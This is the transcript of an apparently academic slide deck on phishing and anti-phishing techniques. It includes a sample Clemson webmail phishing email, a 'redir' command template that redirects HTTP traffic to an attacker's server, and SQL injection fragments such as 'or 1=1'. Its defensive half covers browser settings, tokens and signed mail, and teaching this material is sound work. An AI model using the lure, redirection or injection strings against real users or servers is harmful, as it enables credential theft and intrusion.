PHISHING AND ANTI-PHISHING TECHNIQUES Sumanth, Sanath and Anil CpSc 620.

Slides:



Advertisements
Similar presentations
TrustPort Net Gateway Web traffic protection. Keep It Secure Contents Latest security threats spam and malware Advantages of entry point.
Advertisements

What is Bad ? Spam, Phishing, Scam, Hoax and Malware distributed via
By Hiranmayi Pai Neeraj Jain
7 Effective Habits when using the Internet Philip O’Kane 1.
Phishing (pronounced “fishing”) is the process of sending messages to lure Internet users into revealing personal information such as credit card.
Malicious Attacks By Chris Berg-Jones, Ethan Ungchusri, and Angela Wang.
Cyber X-Force-SMS alert system for threats.
MIS PERSONAL, LEGAL, ETHICAL, AND ORGANIZATIONAL ISSUES OF INFORMATION SYSTEMS CHAPTER 4 Hossein BIDGOLI Phishing that bites Paying for Privacy Pirates.
8.1 © 2007 by Prentice Hall 8 Chapter Securing Information Systems.
Don’t Lose Your Identity – Protect Yourself from Spyware Dan Frommer Sherry Minton.
Phishing – Read Behind The Lines Veljko Pejović
The OWASP Foundation OWASP Chennai Phishing.
Title: The Internet LO: Security risks. Security risks Types of risks: 1.Phishing 2.Pharming 3.Spamming 4.Spyware 5.Cookies 6.Virus.
Quiz Review.
Practical PC, 7 th Edition Chapter 9: Sending and Attachments.
MIS PERSONAL, LEGAL, ETHICAL, AND ORGANIZATIONAL ISSUES OF INFORMATION SYSTEMS CHAPTER 4 LO1 Describe information technologies that could be used in computer.
How It Applies In A Virtual World
Norman SecureSurf Protect your users when surfing the Internet.
Technology ICT Option: . Electronic mail is the transmission of mainly text based messages across networks This can be within a particular.
Internet Safety By Megan Wilkinson. Viruses If your computer haves a viruses on it, it will show one of them or a different one. All commuters have different.
Computer Concepts 2014 Chapter 7 The Web and .
Outline  Infections  1) r57 shell  2) rogue software  What Can We Do?  1) Seccheck  2) Virus total  3) Sandbox  Prevention  1) Personal Software.
GONE PHISHING ECE 4112 Final Lab Project Group #19 Enid Brown & Linda Larmore.
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 Basic Security Networking for Home and Small Businesses – Chapter 8.
Networks and Security. Types of Attacks/Security Issues  Malware  Viruses  Worms  Trojan Horse  Rootkit  Phishing  Spyware  Denial of Service.
Security Chapter What Should I Ask Santa Claus For? spoofing: fraudulent activity in which the sender address and other parts of the.
Hacker Zombie Computer Reflectors Target.
IT security Sherana Kousar 11a/ib1  A virus is a file written with the intention of doing harm, or for criminal activity  Example of viruses are: 
Safe Computing. Computer Maintenance  Back up, Back up, Back up  External Hard Drive  CDs or DVDs  Disk Defragmenter  Reallocates files so they use.
The Internet Netiquette and Dangers. Outline Netiquette Dangers of the Internet.
Networks and Security Monday, 10 th Week. Types of Attacks/Security Issues  Viruses  Worms  Macro Virus  Virus  Trojan Horse  Phishing 
Staying Safe Online Keep your Information Secure.
Lecture#2 on Internet and World Wide Web. Internet Applications Electronic Mail ( ) Electronic Mail ( ) Domain mail server collects incoming mail.
Web Browser Security Prepared By Mohammed EL-Batta Mohammed Soubih Supervised By Eng. Eman alajrami Explain Date 10. may University of Palestine.
Windows Vista Security Center Chapter 5(WV): Protecting Your Computer 9/17/20151Instructor: Shilpa Phanse.
Trend Micro Confidential 9/23/2015 Threat Rules Sharing Advanced Threats Research.
Adam Soph, Alexandra Smith, Landon Peterson. Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details.
People use the internet more and more these days so it is very important that we make sure everyone is safe and knows what can happen and how to prevent.
1 Operating Systems Security. 2 Where Malware hides ? Autoexec.bat or autoexec.nt can start malware before windows start Config.sys, config.nt Autorun.inf.
3-Protecting Systems Dr. John P. Abraham Professor UTPA.
Chapter 1: The Internet and the WWW CIS 275—Web Application Development for Business I.
Protecting Internet Communications: Encryption  Encryption: Process of transforming plain text or data into cipher text that cannot be read by anyone.
Lecture Computer Security Ports, Firewalls, Passwords, and Malware.
CHAPTER 7: PRIVACY, CRIME, AND SECURITY. Privacy in Cyberspace  Privacy: an individual’s ability to restrict or eliminate the collection, use and sale.
 A computer virus is a program or piece of code that is loaded onto your computer without your knowledge and runs against your wishes. It is deliberately.
Types of Electronic Infection
INGOTs Computer Security Name: Elliot Haran. Introduction  Staying safe on the internet  Learning to deal with Cyber Bullying, Stalking and grooming.
Week 10-11c Attacks and Malware III. Remote Control Facility distinguishes a bot from a worm distinguishes a bot from a worm worm propagates itself and.
BY : MUHAMMAD KHUZAIMI B. ISHAK 4 ADIL PUAN MAZITA INFORMATION AND COMMUNICATION OF TECHNOLOGY.
VENKAT DEEP RAJAN SUMALATHA REDDY KARTHIK INJARAPU CPSC 620 CLEMSON UNIVERSITY.
RM Monitor and RMAlerts Installation, Setup, and Requirements January 23, 2010 John Raffenbeul presented this live via an internet connection. These slides.
Copyright ©2005 CNET Networks, Inc. All rights reserved. Practice safety Learn how to protect yourself against common attacks.
What is Spam? d min.
IT Computer Security JEOPARDY RouterModesWANEncapsulationWANServicesRouterBasicsRouterCommands RouterModesWANEncapsulationWANServicesRouterBasicsRouterCommands.
Internet safety By Suman Nazir
Cyber Safety Mohammad Abbas Alamdar Teacher of ICT STS Ajman – Boys School.
Spoofing The False Digital Identity. What is Spoofing?  Spoofing is the action of making something look like something that it is not in order to gain.
SSH. 2 SSH – Secure Shell SSH is a cryptographic protocol – Implemented in software originally for remote login applications – One most popular software.
Information Systems Design and Development Security Precautions Computing Science.
Unit 3 Section 6.4: Internet Security
Chapter 40 Internet Security.
Learn how to protect yourself against common attacks
ISYM 540 Current Topics in Information System Management
I S P S loss Prevention.
Phishing is a form of social engineering that attempts to steal sensitive information.
Protect Your Computer Against Harmful Attacks!
HOW DO I KEEP MY COMPUTER SAFE?
Computer Security.
WJEC GCSE Computer Science
Unit 6.10 – L3 Internet Security
Presentation transcript:

PHISHING AND ANTI-PHISHING TECHNIQUES Sumanth, Sanath and Anil CpSc 620

Message Subject: CONFIRM YOUR ACCOUNT Reply-To: “CLEMSON.EDU SUPPORT TEAM" From: "CLEMSON.EDU SUPPORT TEAM“ Date: Tue, 1 Dec :42: To: Dear CLEMSON.EDU Webmail user, This mail is to inform all our {CLEMSON.EDU } webmail users that we will be maintaining and upgrading our website in a couple of days from now to a new link. As a Subscriber you are required to click on the link below and login to check if you have access to the new link. Click Here: Failure to do this will immediately will render your address deactivated. Thank you for using CLEMSON.EDU. CCIT SUPPORT TEAM

What is Phishing?  Phishing scams are typically fraudulent messages or websites appearing as legitimate enterprises (e.g., your university, your Internet service provider, your bank).  These scams attempt to gather personal, financial and sensitive information.  Derivation of the word “phishing”.

How to phish?  Compromised Web servers – and IM  Port Redirection  Botnets  Key loggers

Compromised Web Servers Attacker Search for Vulnerable Web servers Install phishing websites Send Bulk Compromised Web Server Found!!

Port Redirection  Server is compromised and a program is loaded  All the port 80 ie., http requests are redirected to the attacker’s server  Software known as ‘redir’  Execute the software using: redir --lport=80 –l addr= -cport=80 -caddr=IP addr attacker

Using Botnets  Botnets are computers infected by worms or Trojans and taken over surreptitiously by hackers and brought into networks to send spam, more viruses, or launch denial of service attacks.  Remotely controlled by the attacker. SQL Injection attacks

Attacker Server http request with sql query Attack the server with some queries to drop the tables: or 1=1 SQL pattern matching: like '%admin%'

Keyloggers  Keyloggers are designed to monitor all the key strokes  Hardware  Software  Modified to extract personal information

Current Statistics Source:

Anti-phishing  Ways:  Browser Capabilites  Desktop Agents  Token based  Digitally Signed  Domain Monitoring Client Level Server Level Enterprise Level

Browser Capabilites  Disable pop ups  Disable Java runtime support  Prevent the storage of non-secure cookies  Ensure that downloads are checked by anti-virus software  Eg: Mozilla Firefox Verification

Browser Capabilites

Desktop Agents  Install Anti-virus software which can prevent phishing  Personal IDS  Firewall  Toolbars – Google, Yahoo, NetCraft

Token based Authentication Token based Authentation

Digitally Signed SMTP Sender Mail Server Recipient Sender’s Cert CA Server Validate Sender’s Certificate

Gmail - Verification

Domain Monitoring  Monitor the registration of Internet domains relating to their organisation and the expiry of corporate domains  Google - Safe Browsing API 

References  Honeynet Projecy –  The Phishing Guide - Understanding and Preventing Phishing attacks  Justice Department -  Statistics -  Cross-site scripting attacks –  Images from PayPal, Gmail  Demo - Clemson Webmail – Only for Ethical Hacking  RSA Token Authentication -

Thank You !!!!

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com. Inc. All rights reserved.